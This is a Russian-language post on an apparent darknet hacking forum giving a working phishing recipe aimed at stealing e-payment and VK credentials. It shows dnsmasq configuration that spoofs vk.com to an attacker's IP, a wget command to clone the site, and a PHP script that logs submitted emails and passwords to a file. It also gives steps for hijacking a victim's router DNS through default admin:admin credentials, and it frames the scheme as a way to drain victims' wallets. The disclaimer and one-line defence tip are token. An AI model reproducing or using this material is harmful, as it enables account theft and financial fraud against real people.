Взлом ЭПС. Создание локального dns сервера.

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Morty

VIP

Morty

VIP
26 Окт 2017
537
113
Если у вас есть доступ через RAT к компьютеру жертвы, то с помощью подмены днс вы можете получить необходимые данные от ЭПС жертвы и, минуя смс подтверждение и другие способы защиты, перевести деньги на свой счет. Вы можете заставить жертву ввести код из смс, скачать приложение(ваш вирус) на телефон, подтвердить трейд в Steam. Ограничение составляет лишь ваша фантазия и СИ.
Нужно лишь знать уязвимости различных ЭПС. ПОДСКАЗКА: у qiwi огромной дырой является мобильное приложение
Дисклеймер:
Статья не позывает к действиям, а лишь показывает дыру в безопасности, и как от неё обезопаситься. Ответственность за ваши действия я не несу
Фишинг - это выманивание пароля с помощью атак социальной инженерии. Сегодня рассмотрим одну из них
Посмотреть вложение 34776
Что не так с этой страницей вк?...
На самом деле всё ок, кроме отсутствия https (зелёный замочек). Вряд ли кто то что то заподозрит. Но как так то?
Дело в том, что подменённый dns server преобразовал ваш запрос к вк . Как это устроить?

Натройка dns
Устанавливаем dnsmasq.
Код:
apt-get intall dnsmasq
Идём в файл конфигурации dnsmasq.conf (на многих ос он расположен в разных местах)
В конец допишите:
Код:
domain=com
interface=(ваш интерфейс wifi. Вероятнее всего wlan0)
no-hosts
address=/vk.com/192.168.1.55 (vk.com меняйте на сайт, который вас интересует)
Замените ip выше на ваш локальный (узнать можно из ifconfig)
На этом всё

Копирование сайта
Для начала нужно установить apache.
Я думаю нет смысла копипастить сюда убунту вики или арч вики, они объяснят лучше меня.
Установили? Дальше:
Полностью скопировать нам поможет утилита wget
Команда
Код:
wget -k -l 7 -p -E vk.com
Скопирует нам сайт в папку vk.com в месте, где открыта консоль
Файлы из этой папки копируем в папку http вашего apache.
Теперь открываем файл index.html
Ищем строки начинающиеся на <form method="post"...
И меняем action на "login.php"
После замены создаём сам login.php с тактм содержанием:
PHP:
<?PHP
$Log = $_POST['email'];
$Pass = $_POST['pass'];
$log = fopen("database.txt", "at");
fwrite($log,"\n $Log:$Pass \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL = 192.168.1.55'></head></html>
Первые строки сохраняют полученные логин и пароль, а последняя перезагрузит страницу (вместо 192.168.1.55 очевидно надо писать свой ip)

Подмена dns на роутере
Заходим в 192.168.1.1 или 192.168.1.0 (веб интерфейс роутера). Редко кто меняет стандартные admin:admin. Ищем вкладку с dns. Обычно она расположена в вкладке "интернет"
8cad4d102f8e0b7a1866e7759106840a.jpg
Вставьте свой ip
На этом всё. Включаете apache, и ждёте пары login:password.


Как уберечь свою сеть:
СМЕНИТЕ admin:admin! И лучше вообще обрубить 80 порт на только проводное соединение. Ну тут уж как знаете.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя